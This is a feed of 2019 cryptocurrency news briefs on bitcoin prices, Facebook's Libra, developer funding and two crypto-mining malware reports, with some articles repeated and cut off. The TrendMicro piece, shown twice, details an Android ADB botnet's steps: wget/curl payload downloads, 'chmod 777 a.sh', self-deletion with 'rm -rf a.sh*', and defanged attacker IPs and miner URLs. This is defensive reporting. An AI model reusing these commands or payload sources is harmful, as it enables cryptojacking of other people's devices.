Researchers Uncover Threat of ‘Unusual’ Virtual Machine Crypto Mining

Researchers Uncover Threat of ‘Unusual’ Virtual Machine Crypto Mining

Cybersecurity firm ESET has detected what it describes as an unusual and persistent cryocurrency miner distributed for macOS and Windows since August 2018. The news was revealed in a report from ESET Research published on June 20. According to ESET, the new malware, dubbed “LoudMiner,” uses virtualization software — VirtualBox on Windows and QEMU on macOS — to mine crypto on a Tiny Core Linux virtual machine, thus having the potential to infect computers across multiple operating systems. The miner itself reportedly uses XMRig — an open-source software used for mining privacy-focused altcoin monero (XMR) — and a mining pool, thereby purportedly thwarting researchers’ attempts to retrace transactions. The research revealed that for both macOS and windows, the miner operates within pirated applications, which are bundled together with virtualization software, a Linux image and additional files. Upon download, LoudMiner is installed before the desired software itself, but conceals itself and only becomes persistent after reboot. ESET notes that the miner targets applications whose purposes are related to audio production, which usually run on computers with robust processing power and where high CPU consumption — in this case caused by stealth crypto mining — might not strike users as suspicious. Moreover, the attackers purportedly exploit the fact that such complex applications are usually complex and large in order to conceal their virtual machine images. The researchers add: “The decision to use virtual machines instead of a leaner solution is quite remarkable and this is not something we routinely see.” ESET has identified three strains of the miner targeted at macOS systems, and just one for Windows thus far. As a warning to users, the researchers state that “obviously, the best advice to be protected against this kind of threat is to not download pirated copies of commercial software.” Nonetheless, alongside high CPU consumption, they offer several hints to help users detect something might be awry, included trust popups from an unexpected, “additional” installer, or a new service added to the startup services list (Windows) or a new Launch Daemon (macOS). Network connections to unusual domain names — due to scripts inside the virtual machine that contacting the C&C server to update the miner’s configuration — are another giveaway, the researchers add. Yesterday, Cointelegraph published an in-depth…

BIS: Facebook’s Foray into Cryptocurrency Poses New Risks for Banks

BIS: Facebook’s Foray into Cryptocurrency Poses New Risks for Banks

The Bank of International Settlements (BIS) has warned that the financial services poised to be offered by big tech firms such as Facebook, Google and Amazon could generate new risks for the banking sector. The BIS — an international financial institution in Switzerland owned by 60 of the world’s central banks — published a report outlining its stance on June 23. Hot on the heels of Facebook’s newly-announced cryptocurrency, Libra, the BIS said that while big tech firms’ foray into finance can bring efficiency gains and broaden financial inclusion, regulators must step up their action to mitigate the new and complex risks involved. According to BIS, big tech firms’ extensive user base, access to user data and multi-faceted business models have the potential to rapidly change the financial services industry. Their low-cost structure business is highly scalable, and the network structure of widely-visited platforms can help promote financial inclusion in populations that remain underbanked, it notes. Yet, the BIS warns, “the very features that bring benefits also have the potential to generate new risks and costs associated with market power.” The BIS claims that big tech firms introduce both known — as well as new and unfamiliar — risks to the financial services landscape. Among the established issues, it notes the risks to financial stability and consumer protection posed by tech giants that “have the potential to loom large very quickly as systemically relevant financial institutions” — thereby disrupting the traditional banking sector and existing structure of financial intermediation. The report notes that such firms efficiently leverage a “data-network-activities loop” that could well accelerate the success of their entry into finance, yet this very business model raises new and unprecedented challenges for regulators — notably competition and data privacy issues. Given that firms such as Facebook straddle traditional regulatory perimeters and national borders, the BIS calls for national and international coordination among authorities to “ensure a level playing field between big techs and banks.” As previously reported,  Facebook published the white paper for its long-awaited cryptocurrency and blockchain-based financial infrastructure project, Libra, on June 18. International reactions to Libra have thus far been mixed, including ambivalent remarks from the Chair of the United States Federal Reserve, and a statement from the chairman of the Russian…

Bitcoin Hits 15-Month High as Naysayers Double Down on ‘Dead Cat Bounce’

Bitcoin Hits 15-Month High as Naysayers Double Down on ‘Dead Cat Bounce’

Bitcoin (BTC) was holding steady around $10,850 on June 24 after a fresh surge took it above $11,000 for the first time in over a year. Market visualization courtesy of Coin360 Data from Coin360 showed a slight correction kicking in for bitcoin on Monday, markets consolidating gains after a dramatic weekend. BTC/USD had climbed as high as $11,230 in recent days, marking its best performance since early March 2018. The action did not go unnoticed, with mainstream media titles appearing to struggle with explaining the return of a cryptocurrency they had previously announced all but dead. Many quoted traditional finance sources who maintained that the current bull-run is doomed to fail and that bitcoin investors will ultimately lose everything in fiat terms. “Don’t get fooled by the dead-cat bounce this year,” Whitney Tilson, founder of Empire Financial Research and a former hedge-fund manager said quoted by Bloomberg. “Mark my words: A year from now, it will be a lot lower. This is a techno-libertarian pump-and-dump scheme that will end in ruin.” Bitcoin’s weekly gains currently total just over 17%, while monthly returns are closer to 35%. Bitcoin 7-day price chart. Source: Coin360 Altcoins fared somewhat worse as BTC/USD corrected, with many in the top twenty by market cap shedding 2-3% in the 24 hours to press time. Ethereum (ETH) fell 3% to hit $306, while Ripple (XRP) was trading 5% lower at just over $0.45 per token. Bucking the trend was Tron (TRX), which gained 3.1% after the network saw the launch of its first stablecoin asset. Ether 7-day price chart. Source: Coin360 The total cryptocurrency market cap is now comfortably above $300 billion, Bitcoin’s weekend moonshot further expanding its market dominance to more than 59%. As Cointelegraph reported, multiple significant factors suggest the largest crytocurrency’s longer-term trajectory will take it far past previous all-time highs.

A Monumental Fight Over Facebook’s Cryptocurrency Is Coming

A Monumental Fight Over Facebook’s Cryptocurrency Is Coming

Michael J. Casey is the chairman of CoinDesk’s advisory board and a senior advisor for blockchain research at MIT’s Digital Currency Initiative. The following article originally appeared in CoinDesk Weekly, a custom-curated newsletter delivered every Sunday exclusively to our subscribers. Given how slowly Washington lawmakers have taken to devise a coherent, informed view of cryptocurrency, the Chair of the House Financial Services Committee’s rapid leap to action last week over Facebook’s ambitious Libra project was remarkably fast. But let’s reflect not on the details of Rep. Maxine Waters’ (D-Calif.) urgent requests that  Facebook to cease work on Libra until after hearings are held or on how European lawmakers made similar appeals. The important takeaway from these legislators’ actions is that they are able to make such demands at all. since this is not the case with truly decentralized projects. Unlike with bitcoin, representative in Congress can directly identify and talk to the people in charge of the Libra project. They can subpoena them and, thus, pressure them. They might start with David Marcus, head of Facebook subsidiary Calibra, but, ultimately, it’s Facebook CEO Mark Zuckerberg who’ll give lawmakers the greatest leverage. In this case, the buck stops with Zuck. Now, imagine a Congressional leader calling for a halt in bitcoin development. Who exactly are they going to pressure to end an open-source project involving millions of globally spread mostly unidentifiable developers, miners and users? This distinction – between one project with a single, identifiable authority figure and another whose governance is distributed and leaderless with a founder who has never revealed their identity – goes to the heart of a crypto community critique that the social media giant’s initiative is not censorship resistant. When there’s someone in charge, an interested party – a policymaker, a banker, a regulator, a shareholder – can lean on them to make changes. And when the blockchain consensus model is based on a club-like permissioned membership, a coordinated effort to alter, or censor, the ledger is always possible. And if the ledger or its software can be altered by this pressure, the Libra platform can’t unconditionally promise to support open, unfettered access for users and a permissionless innovation environment for developers. Let’s be clear: Libra’s designers have thought deeply about how…

TrendMicro Detects Crypto Mining Malware Affecting Android Devices

TrendMicro Detects Crypto Mining Malware Affecting Android Devices

A new cryptocurrency-mining botnet has been detected exploiting Android Debug Bridge ports, a system designed to resolve app defects installed on a majority of Android phones and tablets. The botnet malware, as reported by Trend Micro, has been detected in 21 countries and is most prevalent in South Korea. The attack takes advantage of the way open ADB ports don’t require authentication by default, and once installed is designed to spread to any system that has previously shared an SSH connection. SSH connections connect a wide range of devices – everything from mobile to Internet of Things (IoT) gadgets – meaning a lot of products are susceptible. “Being a known device means the two systems can communicate with each other without any further authentication after the initial key exchange, each system considers the other as safe,” the researchers say. “The presence of a spreading mechanism may mean that this malware can abuse the widely used process of making SSH connections.” It begins with an IP address. 45[.]67[.]14[.]179 arrives through the ADB and uses the command shell to update the working directory to “/data/local/tmp,” as .tmp files often have default permission to execute commands. Once the bot determines its entered a honeypot, it uses the wget command to download the payload of three different miners, and curl if wget is not present in the infected system. The malware determines which miner is best suited to exploit the victim depending on the system’s manufacturer, architecture, processor type, and hardware. An additional command, chmod 777 a.sh, is then executed to change the permission settings of the malicious drop. Finally, the bot conceals itself from the host using another command, rm -rf a.sh*, to delete the downloaded file. This also hides the trail of where the bug originated from as it spreads to other victims. Researchers examined the invading script and determined the three potential miners that can be used in the attack – all delivered by the same URL – are: http://198[.]98[.]51[.]104:282/x86/bashhttp://198[.]98[.]51[.]104:282/arm/bashhttp://198[.]98[.]51[.]104:282/aarch64/bash They also found the script enhances the host’s memory by enabling HugePages, which enables memory pages that are greater than its default size, to optimize mining output. If miners are already found using the system the botnet attempts to invalidate their URL and kill them by…

Bitcoin Tops $11.3K to Hit Fresh 2019 Highs

Bitcoin Tops $11.3K to Hit Fresh 2019 Highs

Bitcoin has set a new price high for 2019, reaching as high as $11,304 today before conceding a short-term period of profit taking. At 21:00 UTC on June 23, the world’s largest cryptocurrency by market capitalization shot upwards on the daily chart, cementing a new high beyond June 22’s peak of $11,215. The move to another 2019 high comes after bitcoin’s price dropped to as low as $10,416 on June 23 before another surge of buying pressure pushed prices back above $10,750 within the same day. From then BTC bolstered 6 percent, rising above $11,000 at around 19:00 UTC on Sunday evening and then reaching over $11,300 two hours later. It’s currently changing hands at $10,768 as per CoinDesk’s price data. BTC’s 2019 bull run has already started off with a bang in recent weeks, a likely a combination of traders buying into their own fear-of-missing-out (FOMO) as well as institutions chasing the tail end announcement of Facebook’s project Libra. However, large levels of volume failed to accompany the rally, beginning at 97.6 billion traded over a 24-hour period and continued to decrease to as low as 67.5 billion by days end, meaning that the move was unsupported and a small sell-off from that point out, was definite. Its “Real 10” volume – a metric that takes into account trading volume from exchanges reporting honest volume figures as identified in a report by Bitwise Asset Management – currently stands at $46.17 billion, a large difference, according to Messari.io. Meanwhile, the rest of the market remains relatively flat today, with but a few in the top 20 posting gains. Cadano (ADA) and UNUS SED LEO (LEO) are the only two in the green within the top 20 at CoinMarketCap and are both posting 0.4-2.4 percent growth, respectively, over a 24-hour period. In addition, the total market capitalization rose to a high of $331.8 billion, its highest point since July 31, 2018, while the market capitalization for altcoins is down $3.8 billion over a 24-hour period pointing to a preference in holding BTC above all else amongst the trading elite. Disclosure: The author holds no cryptocurrency at the time of writing.Ferris wheel via Shutterstock

Where to Find Bitcoin’s Rising Stars

Where to Find Bitcoin’s Rising Stars

Thirteen coders and academics gathered this week at Chaincode Labs in New York City for the bitcoin protocol residency program, in what organizers say is the most intensive and diverse cohort to date. It would be hard to overstate how impactful this quiet program is, as one of the few resources for independent developers in the bitcoin ecosystem. Members of the program’s prior three cohorts went on to create the lightning browser extension Joule as well as the nonprofit educational resource Bitcoin Optech. Matt Corallo, an alum of the 2016 residency, authored notable efficiency improvements such as FIBRE and the rust-lightning implementation, which makes it easier for users to build and interact with layers of the bitcoin network. “Having diverse funding sources for bitcoin protocol development is essential to maintain decentralization,” said Alex Morcos, co-founder of Chaincode Labs, which funds the program. “The good news is that more organizations fund open-source developers than ever before, including the MIT Digital Currency Initiative, Blockstream, DG Labs, Square, Xapo and others.” According to the residency organizer, Adam Jonas, this year’s 12-week program is the longest session to date. Out of 216 applicants from 39 countries, this fourth class will include eight developers completing the entire program. The other five participants, including a few academics who don’t write code, were only able to attend for roughly three weeks of seminars. The second portion of the residency, after these seminars, is focused on supporting residents as they build independent, shippable projects. Announcing our summer 2019 Chaincode residents: AntoineAmiti @amiziCarla @actuallycarlakcElichai @Elichai2Fabian @fjahrHugo @hugohanoiJames @digi_jamesRichard @remyers_Tim @takinbo (1/3) — Chaincode Labs (@ChaincodeLabs) May 23, 2019 A significant portion of the program’s reading materials and presentations will also be shared online through sites like GitHub, so that anyone can use them for studying at home. “It’s by far the longest [program] we’ve ever done,” Jonas said. “The whole idea is we’d like to make this residency available to people regardless of their circumstances. … We’ve just made sure that their costs are covered.” These stipends and flexible requirements, tailored to each participant’s needs, allowed people like lightning developer Jamal James to attend. As an entrepreneur and father of three, taking a whole summer off wouldn’t have been feasible. Yet he plans to…

Bitcoin Tests $11.3K With Fresh 2019 Highs

Bitcoin Tests $11.3K With Fresh 2019 Highs

Bitcoin has broken yet another 2019 record, reaching as high as $11,304, before conceding a short-term period of profit taking. At 21:00 UTC on June 23, the world’s largest cryptocurrency by market capitalization shot upwards on the daily chart, cementing a new high beyond June 22’s peak of $11,215. The move to another 2019 high comes after bitcoin’s price dropped to as low as $10,416 on June 23 before another surge of buying pressure pushed prices back above $10,750 within the same day. From then BTC bolstered 6 percent, rising above $11,000 at around 19:00 UTC on Sunday evening and then reaching over $11,300 two hours later. It’s currently changing hands at $10,768 as per CoinDesk’s price data. BTC’s 2019 bull run has already started off with a bang in recent weeks, a likely a combination of traders buying into their own fear-of-missing-out (FOMO) as well as institutions chasing the tail end announcement of Facebook’s project Libra. However, large levels of volume failed to accompany the rally, beginning at 97.6 billion traded over a 24-hour period and continued to decrease to as low as 67.5 billion by days end, meaning that the move was unsupported and a small sell-off from that point out, was definite. Its “Real 10” volume – a metric that takes into account trading volume from exchanges reporting honest volume figures as identified in a report by Bitwise Asset Management – currently stands at $46.17 billion, a large difference, according to Messari.io. Meanwhile, the rest of the market remains relatively flat today, with but a few in the top 20 posting gains. Cadano (ADA) and UNUS SED LEO (LEO) are the only two in the green within the top 20 at CoinMarketCap and are both posting 0.4-2.4 percent growth, respectively, over a 24-hour period. In addition, the total market capitalization rose to a high of $331.8 billion, its highest point since July 31, 2018, while the market capitalization for altcoins is down $3.8 billion over a 24-hour period pointing to a preference in holding BTC above all else amongst the trading elite. Disclosure: The author holds no cryptocurrency at the time of writing.Bitcoin bull image via Shutterstock

TrendMicro Detects Crypto-Mining Malware Affecting Android Devices

TrendMicro Detects Crypto-Mining Malware Affecting Android Devices

A new cryptocurrency-mining botnet has been detected exploiting Android Debug Bridge ports, a system designed to resolve app defects installed on a majority of Android phones and tablets. The botnet malware, as reported by Trend Micro, has been detected in 21 countries and is most prevalent in South Korea. The attack takes advantage of the way open ADB ports don’t require authentication by default, and once installed is designed to spread to any system that has previously shared an SSH connection. SSH connections connect a wide range of devices – everything from mobile to Internet of Things (IoT) gadgets – meaning a lot of products are susceptible. “Being a known device means the two systems can communicate with each other without any further authentication after the initial key exchange, each system considers the other as safe,” the researchers say. “The presence of a spreading mechanism may mean that this malware can abuse the widely used process of making SSH connections.” It begins with an IP address. 45[.]67[.]14[.]179 arrives through the ADB and uses the command shell to update the working directory to “/data/local/tmp,” as .tmp files often have default permission to execute commands. Once the bot determines its entered a honeypot, it uses the wget command to download the payload of three different miners, and curl if wget is not present in the infected system. The malware determines which miner is best suited to exploit the victim depending on the system’s manufacturer, architecture, processor type, and hardware. An additional command, chmod 777 a.sh, is then executed to change the permission settings of the malicious drop. Finally, the bot conceals itself from the host using another command, rm -rf a.sh*, to delete the downloaded file. This also hides the trail of where the bug originated from as it spreads to other victims. Researchers examined the invading script and determined the three potential miners that can be used in the attack – all delivered by the same URL – are: http://198[.]98[.]51[.]104:282/x86/bashhttp://198[.]98[.]51[.]104:282/arm/bashhttp://198[.]98[.]51[.]104:282/aarch64/bash They also found the script enhances the host’s memory by enabling HugePages, which enables memory pages that are greater than its default size, to optimize mining output. If miners are already found using the system the botnet attempts to invalidate their URL and kill them by…

BCH Development Fund Doubles Its Goal After a Successful Month

BCH Development Fund Doubles Its Goal After a Successful Month

In May, a group of Bitcoin Cash (BCH) supporting businesses and individuals launched a fundraiser to support BCH development. Since then the fundraiser has received massive support and so the organizers have decided to double the goal to 1600 BCH by August 1, 2019. Moreover, other projects have been added to the Bitcoin.com/fundraise page in order to include development projects like Bitcoin Verde and Flowee the Hub. Also read: 10 Years Ago Bitcoin’s Genesis Block Changed the Course of History Support a Fairer Financial System by Donating to Bitcoin Cash Development Development is important in order to maintain a strong cryptocurrency network and make sure it scales to meet the needs of everyone living on earth. The Bitcoin Cash (BCH) network aims to be the electronic peer-to-peer cash system as described in the whitepaper written by Satoshi Nakamoto more than 10 years ago. To ensure long-lasting and effective development, a group of crypto-based business and individuals started a fundraiser for open source developers working with the BCH chain. Originally the fundraiser had planned to raise 800 BCH for developers by August 1, but six days ago the fundraiser neared its goal. So the organization FVNI Development Society in collaboration with Bitcoin.com, Bitcoincash.org, Electron Cash, Bitcoincash.com, and various other businesses decided to double the goal. If you don’t know which project you would like to specifically donate to, you can simply donate to the BCH General Fund and your donation will go toward Bitcoin Cash development. Right now there are six different projects BCH fans can donate funds to: Bitcoin ABC, Bchd, Bitcoin Unlimited, Bcash, Bitcoin Verde, and Flowee the Hub. All the projects have different team members and unique types of BCH clients. Satoshi’s original implementation, for instance, was written in C++, but the protocol itself is compatible with any language as long as the software follows consensus rules. Bitcoin Cash Protocol Implementations Bitcoin ABC Bitcoin ABC is a full node implementation of the Bitcoin Cash protocol written in C++ and the ABC stands for Adjustable Blocksize Cap. The Bitcoin ABC client is the most dominant BCH implementation. At the moment, 54% of the current 1,549 public nodes running on the Bitcoin Cash network use ABC. The client is open source and the repository’s binaries…